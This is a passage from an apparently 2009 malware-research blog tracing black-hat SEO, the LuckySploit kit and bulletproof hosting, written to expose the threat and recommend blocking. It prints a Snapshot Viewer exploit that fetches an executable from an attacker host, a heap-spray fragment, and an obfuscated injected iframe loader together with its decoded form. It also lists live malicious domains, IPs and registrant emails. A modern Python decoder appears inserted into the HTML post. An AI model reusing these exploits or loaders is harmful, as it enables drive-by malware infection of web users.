src='hxxp://<span class="scam_website">clarafin.info</span>/traff/index.php?'+Math.round(Math.random()<br 
/>*253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'><br /> </iframe><br /></td></tr></table><br />You can follow the result for "<span class="scam_website">clarafin.info</span>" on this page: <br /><a href="http://isc.sans.org/diary.html?storyid=6178" target="_blank" style=" color:#000">Internet Storm Center: Hosted javascript leading to .cn PDF malware</a> <br /><br />-------------<br /><br /><p> And now the new one that just appeared on the same page: beebest[.]cn<br /><br /><a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=beebest.cn" target="_blank" style="color:#000">Google Diagnostic for beebest.cn</a> AS41665 (HOSTING)<br /><br />This is just a part of the code:<br /></p><table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="448" height="450" style="padding:10px"><p> function ss()<br />{<br />try{<br />ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");<br />var arbitrary<br />_file = "<b>hxxp://beebest.cn/dlutrl23dnwfas/exe.php</b>";<br />var dest = 'C:/Program Files/Outlook Express/wab<br />.exe';<br />document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'><br /></object><br />");<br />attack.SnapshotPath = arbitrary_file;<br />setTimeout('window.location = "ldap://127.0.0.1"',3000);<br />a<br />ttack.CompressedPath = dest;<br />attack.PrintSnapshot(arbitrary_file,dest);<br />}catch(e){}<br />}<br />function xml()<br />{<br />var spray = unescape("%u0a0a%u0a0a");<br />do { spray += spray; } while(spray.length < 0xd0000);</p><p>memory = new Array();<br />for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }<br />document.<br />getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><!<br /></p></td></tr></table><br /><table width="437" border="0" cellspacing="0" cellpadding="0"><tr><td width="282" height="31">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/index.php<br /></td><td width="155"><a 
href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=8c979b2883f0cf92419a4b342fff4545&t=1239946824" target="_blank">URL Analysis</a></td></tr><tr><td height="32" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/spl/pdf.pdf<br /></td><td style="border-top:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&t=1239981396&type=js">URL Analysis</a></td></tr><tr><td height="39" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/exe.php<br /></td><td style="border-top:solid 1px #CCC"><a href="http://www.virustotal.com/analisis/e503d8229f7e75c16e93fb24ea0158a9" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1417b1756c1d1e6641d2d1aa0a04cc219&call=first" target="_blank">Anubis</a></td></tr></table><br /><br />A ThreatExpert result shows the connection with stopgam.cn and <br />stopgam2.cn after infection<br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=8f82a4d3271465a32ec888839bdcede0" target="_blank">ThreatExpert Result</a><br /><br /><hr /><br /><br />It's recommended that you block these domains and IPs using your hosts file or your firewall.<br /> <br />These domains are also cited on Malware Domain List: <a href="http://www.malwaredomainlist.com/mdl.php?search=91.212.65.7&colsearch=All&quantity=50" target="_blank">91.212.65.7</a> <br />and all are still active.<br /><br /><table width="294" border="0" cellspacing="0" cellpadding="0"><tr><td height="20">hxxp://<span class="scam_website">beebest.cn</span></td><td>78.109.25.215</td></tr><tr><td height="20" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">clarafin.info</span></td><td style="border-top:solid 1px #CCC">212.5.74.37</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">corpamata.cn</span><br /></td><td style="border-top:solid 1px 
#CCC">78.109.25.215</td></tr><tr><td width="164" height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">extraspray.com</span><br /></td><td width="130" style="border-top:solid 1px #CCC">72.232.116.51</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span><br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">rifnasax.cn</span></td><td style="border-top:solid 1px #CCC">91.212.65.7</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span></td><td style="border-top:solid 1px #CCC">85.17.136.137</td></tr><tr><td height="18" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">stopgam.cn</span></td><td style="border-top:solid 1px #CCC">85.17.136.137</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">stopgam2.cn</span></td><td style="border-top:solid 1px #CCC">174.129.244.106<br />174.129.241.185</td></tr></table><br /><br />78.109.25.217<br /><br />IP Location - Namibia - Plathost2 - Ivan Kirst<br /><br />Domain Name: <span class="scam_website">beebest.cn - stopgam.cn - corpamata.cn</span><br />Domain Status: ok<br />Registrant Organization: DomainsC<br />Registrant Name: MichellGregory<br />Administrative Email: abuse@domainsreg.cn<br />Sponsoring Registrar: 厦门华融盛世网络有限公司 - <br />Xiamen Huarong Spirit Network Limited<br />Name Server: ns1.us.editdns.net<br />Name Server: ns2.us.editdns.net<br />Name Server: ns3.us.editdns.net<br />Registration Date: 2009-02-11<br />Expiration Date: 2010-02-11<br /><br />212.5.74.37<br /><br />IP Location - Russia<br /><br />Domain Name: <span class="scam_website">clarafin.info</span><br />Domain Status: ok<br />Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd<br />Name Server: ns1.us.editdns.net<br />Name Server: ns2.us.editdns.net<br 
/>Name Server: ns3.us.editdns.net<br />Registration Date: 2009-03-18<br />Expiration Date: 2010-03-18<br /><br />85.17.136.137<br /><br />IP Location - Netherlands - LeaseWeb<br /><br />Domain Name: <span class="scam_website">sgqw.info</span> <br />Domain Status: ok<br />Registrant Organization: Private person <br />Registrant Name: Sumir Mahadjan <br />Administrative Email: mahadjans9@gmail.com <br />Sponsoring Registrar: Regtime Ltd. (R455-LRMS)<br />Name Server: ns1.mtpv.info<br />Name Server: ns2.mtpv.info<br />Name Server: ns3.us.editdns.net<br />Registration Date: 2009-04-01<br />Expiration Date: 2010-01-01<br /><br />72.232.116.51 <br /><br />IP Location - US - Layered Technologies, Inc.<br /><br />Domain Name: <span class="scam_website">extraspray.com</span><br />Domain Status: ok<br />Registrant Organization: Private person <br />Registrant Name: Sumir Mahadjan<br />Administrative Email: mahadjans9@gmail.com <br />Sponsoring Registrar: Regtime Ltd.<br />Name Server: vc11.amhost.net<br />Name Server: vc12.amhost.net<br />Registration Date: 2009-03-09<br />Expiration Date: 2010-03-09 <br /><br />174.129.244.106<br />174.129.241.185 <br /><br />IP Location - US - Amazon.com, Inc. <br /><br />Domain Name: <span class="scam_website">stopgam2.cn</span><br />ROID: 20090417s10001s12986159-cn <br />Domain Status: clientTransferProhibited <br />Registrant Name: Zitoclick <br />Administrative Email: support@zitoclick.com <br />Sponsoring Registrar: InamePro dba Dynadot <br />Name Server: ns1.dsredirection.com <br />Name Server: ns2.dsredirection.com <br />Registration Date: 2009-04-17 05:23 <br />Expiration Date: 2010-04-17 05:23 <br /><br />91.212.41.119 <br /><br />Domain Name: <span class="scam_website">tixwagoq.cn</span><br />Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. 
Hangzhou<br />Registrant Name: 周明 - Zhou<br />Administrative Email: suhalbuia@163.com <br />Sponsoring Registrar: 易名中国 - Easy Chinese<br />Name Server: ns1.runsdns.cn <br />Name Server: ns2.runsdns.cn <br />Registration Date: 2009-03-18 22:16 <br />Expiration Date: 2010-03-18 22:16 <br /><br />inetnum: 91.212.41.0 - 91.212.41.255<br />netname: gaztranzitstroyinfo-net<br />descr: LLC "Gaztransitstroyinfo"<br />country: Russia<br /> ------------<br /><br />91.212.65.7<br /><br />IP Location - Ukraine - Eurohost LLC <br /><br />Domain Name: <span class="scam_website">rifnasax.cn</span><br />Registrant Organization: Yong also Import and Export Corporation<br />Registrant Name: 张龙 - Long<br />Administrative Email: alvin_555@yeah.net <br />Sponsoring Registrar: 易名中国 - Easy Chinese<br />Name Server: ns2.dnsmytruedns.com <br />Name Server: ns1.dnsmytruedns.com <br />Registration Date: 2009-02-13 19:29 <br />Expiration Date: 2010-02-13 19:29 <br /><br />This IP appears to host several websites with live exploits.<br /><br />91.212.65.7 <br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">dnsmytruedns.com</span><br /> hxxp://<span class="scam_website">hayboxiw.cn </span>(<a href="http://wepawet.cs.ucsb.edu/view.php?hash=d3305cce9ac1c0b1ccfdea16bbebc49a&t=1239984709&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">paksusic.cn</span><br />hxxp://<span class="scam_website">paylayos.cn</span><br />hxxp://<span class="scam_website">peskufex.cn</span><br />hxxp://<span class="scam_website">porgacig.cn</span><br />hxxp://<span class="scam_website">qicdator.cn </span>(<a href="http://wepawet.cs.ucsb.edu/view.php?hash=baca7b81a5ad8bcc70b210847db959c1&t=1238631850&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">ralcofic.cn</span><br />hxxp://<span class="scam_website">rifnasax.cn</span> (<a 
href="http://wepawet.cs.ucsb.edu/view.php?hash=d52f9efb85ed74924aad6cd64720d575&t=1237274961&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">tozxiqud.cn</span></td></tr></table><br />91.212.41.119<br /><br /><table width="273" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="273" height="20">hxxp://<span class="scam_website">tixwagoq.cn/in.cgi?6</span> (<a href="http://wepawet.cs.ucsb.edu/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&t=1239621305&type=js" target="_blank">Analysis</a>)<br /></td> </tr></table><br /><br /></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-55369463301212284662009-04-09T14:38:00.001-07:002009-04-10T08:15:50.371-07:00Black Hat SEO - RBN Hacks, p.2<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed</span><br /><br /> Welcome to LuckySploit:) ITS TOASTED<br /> <br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS 
page</a> if you need more information<br /></td></tr></table><br /><br /><b>WARNING</b>: All sites listed on this page are dangerous (live URLs with exploits) which lead <br />to trojans being automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><br /><hr /> <p>A nice article provided by Finjan about the LuckySploit toolkit, one of the <br /> latest script-kiddie toolkits that cyber criminals use these days, can be found <br /> by following this link: <a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2213" target="_blank">LuckySploit Toolkit Exposed</a><br /><br />Using well-known techniques such as "<a href="http://www.finjan.com/Content.aspx?id=1456" target="_blank">Code Obfuscation</a>", most often used to <br /> hide its true intent (sometimes randomly generated), here is one of the <br /> numerous malicious scripts found on several compromised websites.<br /></p> <table width="508" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="504" height="86" style="padding:15px"><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><br /><script>function c102916999516l4963660743084(l4963660743855){<br />var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}<br />function l4963660744fc7(l4963660745797){<br />function l4963660746f0b(){return 2;}<br />var l4963660745f69='';<br />l4963660747eab=String.fromCharCode;<br />for(l4963660746738=0;l4963660746738<l4963660745797.length;<br />l4963660746738+=l4963660746f0b()){ <br />l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(<br />l4963660745797.substr(l4963660746738,l4963660746f0b()))));}<br />return l4963660745f69;} <br />var x60='';<br />var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60<br />+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x<br />60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+<br 
/>'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+<br />x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+<br />'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+<br />'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+<br />'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+<br />'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+<br />x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+<br />'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+<br />'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+<br />x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+<br />'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+<br />x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+<br />x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+<br />x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+<br />x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+<br />'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+<br />x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+<br />'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+<br />x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+<br />'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+<br />'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+<br />x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+<br />'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));<br /></script> </td></tr> </table> <br /> The deobfuscated result is:<br /> <br /> <table width="513" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="509" height="86" style="padding:15px"><script><br 
/>if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e<br />%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%<br />2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%<br />68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%<br />34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%<br />65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%<br />65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}<br />var myia=true;<br /></script></td></tr> </table> <br />
and then loads the IFRAME.<br /><br /> <table width="460" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="499" height="61" style="padding:15px"><iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe></td></tr> </table> <p>Note that searching for the script found in the second redirection turns up a lot of discussion referring to <br /> different IPs or hacking problems (injected IFRAMEs): <a href="http://www.google.com/search?hl=en&q=%22if(!myia)%22%20iframe" target="_blank">Google search for "if(!myia)" iframe </a><br /><br /><br />An example of a site on the same IP:<br /><br /><span style="padding:15px">gogo2me.net</span> resolves to <span style="padding:15px">94.247.2.157 [hs.2-157.zlkon.lv]<br /><br /> and then loads an IFRAME (with LuckySploit)<br /></span></p> <table width="536" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="532" height="61" style="padding:15px">hxxp://94.247.2.157/.dif/go.php?sid=1<br />hxxp://94.247.2.157/.lck/?t=3<br />hxxp://94.247.2.157/.lck/?t=6 <br />hxxp://94.247.2.157/.lck/?90f6ff8e287ae123...<br />hxxp://94.247.2.157/.lck/?75c4a0ecf4a4836...</td></tr> </table> <p><a href="http://wepawet.iseclab.org/view.php?hash=53e2d900bba11fc1f78c011fbb8413f6&t=1232989747&type=js" target="_blank">Wepawet Analysis</a><br /><br />
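The two layers shown above (a hex string spliced with an empty variable and decoded two characters at a time with parseInt(pair, 16), then a percent-encoded IFRAME handed to unescape()) can be peeled offline without ever running the script. The decoder below is an added example, not code from this blog or from the LuckySploit kit; the sample it decodes is constructed here in the same shape as the script above but with a placeholder URL (example.invalid) in place of the real redirector, and all function names are mine.

```python
"""Offline decoder for the two-layer loader shown above.

Added example, not code from the original post or from the LuckySploit kit.
Layer 1: a hex string spliced with '+x60+' (x60 is the empty string) that the
         kit decodes two characters at a time with parseInt(pair, 16).
Layer 2: document.write(unescape('%3c%69...')) inside the decoded script,
         which percent-decodes to a hidden IFRAME.
Nothing is evaluated; both layers are undone with regular expressions, and
the sample built by _constructed_sample() uses a placeholder URL.
"""
import re

# var NAME = '<hex>' + x60 + '<hex>' + ... + '<hex>';  -- the splice variable is
# sometimes broken across lines in the wild, so anything except a quote or a
# plus sign is accepted between the two plus signs.
SPLICED_HEX = re.compile(
    r"var\s+\w+\s*=\s*((?:'[0-9A-Fa-f]*'\s*\+[^'+]*\+\s*)*'[0-9A-Fa-f]*')\s*;")
UNESCAPE_CALL = re.compile(r"unescape\(\s*'([^']*)'\s*\)")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")


def recover_hex_literal(js: str) -> str:
    """Join the spliced pieces of the longest hex string literal in `js`."""
    best = ""
    for m in SPLICED_HEX.finditer(js):
        joined = "".join(re.findall(r"'([0-9A-Fa-f]*)'", m.group(1)))
        if len(joined) > len(best):
            best = joined
    if not best:
        raise ValueError("no spliced hex literal found")
    return best


def decode_hex_pairs(hexstr: str) -> str:
    """Mirror the kit's loop: every two hex characters become one character."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string")
    return bytes.fromhex(hexstr).decode("latin-1")


def js_unescape(s: str) -> str:
    """Decode like JavaScript's unescape(): %XX bytes and %uXXXX code units
    (urllib.parse.unquote would leave the %uXXXX form untouched)."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def _dim(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def extract_iframes(html: str) -> list:
    """Return one dict per <iframe>, flagging hidden or 1x1 frames."""
    frames = []
    for m in IFRAME_TAG.finditer(html):
        attrs = {a.group(1).lower(): a.group(2) or a.group(3) or a.group(4) or ""
                 for a in ATTR.finditer(m.group(1))}
        style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
        w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
        hidden = "visibility:hidden" in style or (
            w is not None and h is not None and w <= 1 and h <= 1)
        frames.append({"src": attrs.get("src", ""), "name": attrs.get("name", ""),
                       "width": w, "height": h, "hidden": hidden})
    return frames


def analyze_loader(js: str) -> dict:
    """Peel both layers and report the IFRAMEs the loader would write."""
    script = decode_hex_pairs(recover_hex_literal(js))
    m = UNESCAPE_CALL.search(script)
    html = js_unescape(m.group(1)) if m else ""
    return {"script": script, "html": html, "iframes": extract_iframes(html)}


def _constructed_sample() -> str:
    """Build a loader in the kit's shape (constructed fixture, placeholder URL)."""
    iframe = ("<iframe name=c10 src='http://example.invalid/check.html' "
              "width=349 height=557 style='visibility:hidden'></iframe>")
    inner = "".join("%%%02x" % ord(c) for c in iframe)          # layer 2
    script = ("<script>if(!myia){document.write(unescape('" + inner +
              "'));}var myia=true;</script>")
    hexblob = script.encode("latin-1").hex().upper()            # layer 1
    spliced = "'+x60+'".join(hexblob[i:i + 5] for i in range(0, len(hexblob), 5))
    return ("var x60='';\nvar l4963660748680='" + spliced + "';\n"
            "alert(l4963660744fc7(l4963660748680));")


if __name__ == "__main__":
    result = analyze_loader(_constructed_sample())
    print(result["script"][:60], "...")
    for frame in result["iframes"]:
        print("iframe ->", frame["src"], "(hidden)" if frame["hidden"] else "")
```

Run it on a real sample by passing the text between the kit's `<script>` tags to `analyze_loader()`; the hidden flag is what a triage script should key on, since a visible 349x557 frame with `visibility:hidden` and a 1x1 frame are the two shapes seen in the samples on this page.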
A <a href="http://www.threatexpert.com/report.aspx?md5=8ac678d117c5ce0970f52903f8a610b0">ThreatExpert analysis</a> also indicates the relationship with these viruses/malware:<br /><br />a Zlob variant (<a href="http://www.threatexpert.com/threats/trojan-spy-win32-zbot.html">Trojan-Spy.Win32.Zbot</a>), a keylogger trojan (<a href="http://www.threatexpert.com/threats/trojan-spy-zbot-yeth.html">Trojan-Spy.Zbot.YETH</a>) and a<br />TDSS (alias Alureon) variant <a href="http://www.threatexpert.com/threats/virus-win32-fasec.html">Win32.Fasec [Ikarus]</a><br /><br /> And here I just show you the line :) Also note the use of the RSA algorithm (screenshot)<br /></p> <table width="333" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="329" height="86" style="padding:15px">nextkey = ''; <br />k = '';<br />attack_level = 0;<br />try {<br />f = '<b>Welcome to LuckySploit:) \n ITS TOASTED</b>';<br />} catch (e){<br />} </td></tr> </table> <br /> <p> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ-z0OCUTjUNuVDTlQXkL-W5tNBj_97bV7ZcmNDEIlLHy70OjJAtyVx9j7Im_am3Xj72zOPZKYQkwwLgZL4KXSw1THEVuEj43UVddA3uj0Us4dr6Q0fPDx84XoNO_cBDWzrueaQFBvO5gO/s1600-h/rsa-lucky-powned.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ-z0OCUTjUNuVDTlQXkL-W5tNBj_97bV7ZcmNDEIlLHy70OjJAtyVx9j7Im_am3Xj72zOPZKYQkwwLgZL4KXSw1THEVuEj43UVddA3uj0Us4dr6Q0fPDx84XoNO_cBDWzrueaQFBvO5gO/s320/rsa-lucky-powned.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5321891299924447362" /></a><br /><br /> </p></td></tr><tr><td> </td></tr> </table></td></tr></table></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-53896671711279753732009-04-09T14:34:00.000-07:002009-04-19T11:51:12.722-07:00Black Hat SEO - RBN Hacks, p.1<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br />Inspecting the bad network <br /></p><table width="543" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="543"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URLs with exploits) <br /> which lead to trojans being automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. 
<br />(only links are safe)<br /><br /><hr /><p>If you want information about disinfection, check out this page:<br /> <a href="http://novirusthanks.org/blog/2009/03/analysis-of-a-website-infected-with-a-hidden-iframe/" target="_blank">Analysis of a website infected with a hidden iframe</a> (by NoVirusThanks)<br /> <br />This doesn't include the disinfection of your website (attacked - iframed).<br /> <br />For that, change your passwords (Windows passwords, FTP, email, database <br />access, etc.) and remove the content injected on each page as quickly as possible<br />(contact your hosting provider for assistance).<br /><br />This page lists domains found in thousands of compromised websites through<br />injected obfuscated JavaScript code (IFRAME).<br /><br /><hr />The Zlkon network (DATORU EXPRESS SERVISS) has been cited in several blogs <br /> for hosting malicious content for cyber criminals - for example:<br /><br />On the Symantec website for spreading the <a href="http://www.symantec.com/en/us/security_response/writeup.jsp?docid=2008-121016-4048-99&tabid=2" target="_blank">TDSS trojan</a> [hs.2-104.zlkon.lv] - in conjunction <br />with IPs at UkrTeleGroup Ltd. in December 2008<br /><br />85.255.115.156<br />85.255.112.87<br />85.255.115.50<br />85.255.112.154<br /><br />On the <a href="http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx" target="_blank">msmvps blog</a> for inaccurate whois details in January 2009<br />On the bluetack.co.uk forum for rogue antivirus <a href="http://www.bluetack.co.uk/forums/index.php?showtopic=18064&st=210&p=90509&" target="_blank">here</a> in January 2009<br />Another example with "<a href="http://www.raymond.cc/forum/spyware-viruses/9785-new-rogue-antivirus.html" target="_blank">Total Defender</a>", another rogue antivirus, <a href="http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/" target="_blank">here</a><br />Also found on several websites, including FireEye's "<a 
href="http://blog.fireeye.com/research/2009/02/bad-actors-part-2-zlkon.html" target="_blank">Bad Actors Part 2 - ZlKon</a>" <br /> - <a href="http://ddanchev.blogspot.com/search?q=zlkon" target="_blank">Dancho Danchev's blog</a> <br /> The associated network is cited here: <a href="http://blogs.zdnet.com/security/?p=2764" target="_blank"> Bad, bad, cybercrime-friendly ISPs!</a><br /><br /><br /><hr /><br />A quick look at two IPs at Zlkon in Latvia <br /><br /><br />94.247.3.152 [hs.3-152.zlkon.lv]<br /><br />Using the DNS servers <br /><br />ns1.freednshostserver.com [78.109.18.234]<br />ns1.freednshostserver.com [78.109.18.235] <br /><br />descr: Datacenter Hosting.UA<br />route: 78.109.16.0/20 <br />origin: AS41665<br /><br />we have these domains currently live and kicking, hitting a lot of websites <br />(simply entering a domain or "<span class="trojans_luckysploit">in.cgi?cocacola</span>" in Google reveals a lot of discussion about <br />hacked, iframed domains.)<br /><br /></p><table width="431" border="0" cellspacing="0" cellpadding="0"><tr> <td><span class="trojans_luckysploit">betstarwager.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&t=1239052803&type=js" target="_blank">Analysis</a></td></tr><tr> <td width="266"><span class="trojans_luckysploit">bestlotron.cn/in.cgi?cocacola</span></td> <td width="165"><a href="http://wepawet.iseclab.org/view.php?hash=60a1b098ebbd8a0a856e90100d9244e3&t=1239052609&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">denverfilmdigitalmedia.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=16d7159bfd0d418d6e06ab65f7d8d790&t=1239052806&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">diettopseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=44eb05a65e07e2b4a6a1b62fa7223e14&t=1239052811&type=js" 
target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">filmlifemusicsite.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=e51f24301e2dfd7f50345f7e34a43542&t=1239240102&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">filmlifemusicsite.cn</span>/</td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbdcccf14f5edd00a9ad9c5a38bcd405&t=1237403830&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">filmtypemedia.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=d105fe8dbf2312a2acb0758753641453&t=1237293959&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">litedownloadseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=ac0f1c55cfee34869d00133fddf7be6c&t=1239052790&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">litetopfindworld.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=5b0a23d369d4e147ef587d57a1502a53&t=1239052785&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">litetoplocatesite.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=d881cfdc9c2ff0ed01417d02b5ca099f&t=1239052789&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">nanotopfind.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=ca10a92f348cc68315b5a77b61e6325a&t=1239052787&type=js" 